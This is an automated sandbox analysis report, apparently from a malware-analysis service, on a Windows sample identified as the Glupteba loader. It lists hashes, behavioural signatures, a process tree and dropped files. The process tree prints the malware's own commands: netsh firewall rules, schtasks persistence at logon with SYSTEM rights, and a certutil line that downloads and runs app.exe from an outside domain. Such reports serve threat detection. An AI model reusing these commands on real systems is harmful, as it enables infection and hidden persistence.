Analysis

  • max time kernel
    155s
  • max time network
    166s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 22:56

General

  • Target

    be127f00c805740a6a9e3eb8de6f3ba9ac68101de0f9dbcb41595b91c8d3a76f.exe

  • Size

    3.8MB

  • MD5

    84dbc916b21ee7dd49131e4bb996c3b0

  • SHA1

    cbff0b9a2ca635515722798efb84f53694300afa

  • SHA256

    be127f00c805740a6a9e3eb8de6f3ba9ac68101de0f9dbcb41595b91c8d3a76f

  • SHA512

    d547238b6ddf466b1ab4945f951325e005ef7f9661bf28c9f3fa407eb4169520c16e613f02b646f8443fc383efe8e2e2775689a000540c29c444e355d60a8377

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\be127f00c805740a6a9e3eb8de6f3ba9ac68101de0f9dbcb41595b91c8d3a76f.exe
    "C:\Users\Admin\AppData\Local\Temp\be127f00c805740a6a9e3eb8de6f3ba9ac68101de0f9dbcb41595b91c8d3a76f.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3840
    • C:\Users\Admin\AppData\Local\Temp\be127f00c805740a6a9e3eb8de6f3ba9ac68101de0f9dbcb41595b91c8d3a76f.exe
      "C:\Users\Admin\AppData\Local\Temp\be127f00c805740a6a9e3eb8de6f3ba9ac68101de0f9dbcb41595b91c8d3a76f.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1336
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3904
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:2916
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1544
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23.exe" enable=yes
            4⤵
              PID:3752
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:980
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:3888
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://bbistrovantonbb.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:2768
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:3412
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:2488
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:444

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        84dbc916b21ee7dd49131e4bb996c3b0

        SHA1

        cbff0b9a2ca635515722798efb84f53694300afa

        SHA256

        be127f00c805740a6a9e3eb8de6f3ba9ac68101de0f9dbcb41595b91c8d3a76f

        SHA512

        d547238b6ddf466b1ab4945f951325e005ef7f9661bf28c9f3fa407eb4169520c16e613f02b646f8443fc383efe8e2e2775689a000540c29c444e355d60a8377

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        84dbc916b21ee7dd49131e4bb996c3b0

        SHA1

        cbff0b9a2ca635515722798efb84f53694300afa

        SHA256

        be127f00c805740a6a9e3eb8de6f3ba9ac68101de0f9dbcb41595b91c8d3a76f

        SHA512

        d547238b6ddf466b1ab4945f951325e005ef7f9661bf28c9f3fa407eb4169520c16e613f02b646f8443fc383efe8e2e2775689a000540c29c444e355d60a8377

      • memory/980-140-0x0000000000000000-mapping.dmp
      • memory/980-146-0x0000000000400000-0x00000000036C2000-memory.dmp
        Filesize

        50.8MB

      • memory/980-143-0x0000000004100000-0x00000000044A7000-memory.dmp
        Filesize

        3.7MB

      • memory/1336-133-0x0000000000000000-mapping.dmp
      • memory/1336-136-0x0000000003E36000-0x00000000041DD000-memory.dmp
        Filesize

        3.7MB

      • memory/1336-139-0x0000000000400000-0x00000000036C2000-memory.dmp
        Filesize

        50.8MB

      • memory/1544-137-0x0000000000000000-mapping.dmp
      • memory/2488-149-0x0000000000000000-mapping.dmp
      • memory/2768-145-0x0000000000000000-mapping.dmp
      • memory/2916-135-0x0000000000000000-mapping.dmp
      • memory/3412-147-0x0000000000000000-mapping.dmp
      • memory/3752-138-0x0000000000000000-mapping.dmp
      • memory/3840-130-0x0000000003BCF000-0x0000000003F76000-memory.dmp
        Filesize

        3.7MB

      • memory/3840-132-0x0000000000400000-0x00000000036C2000-memory.dmp
        Filesize

        50.8MB

      • memory/3840-131-0x0000000003F80000-0x0000000004677000-memory.dmp
        Filesize

        7.0MB

      • memory/3888-144-0x0000000000000000-mapping.dmp
      • memory/3904-134-0x0000000000000000-mapping.dmp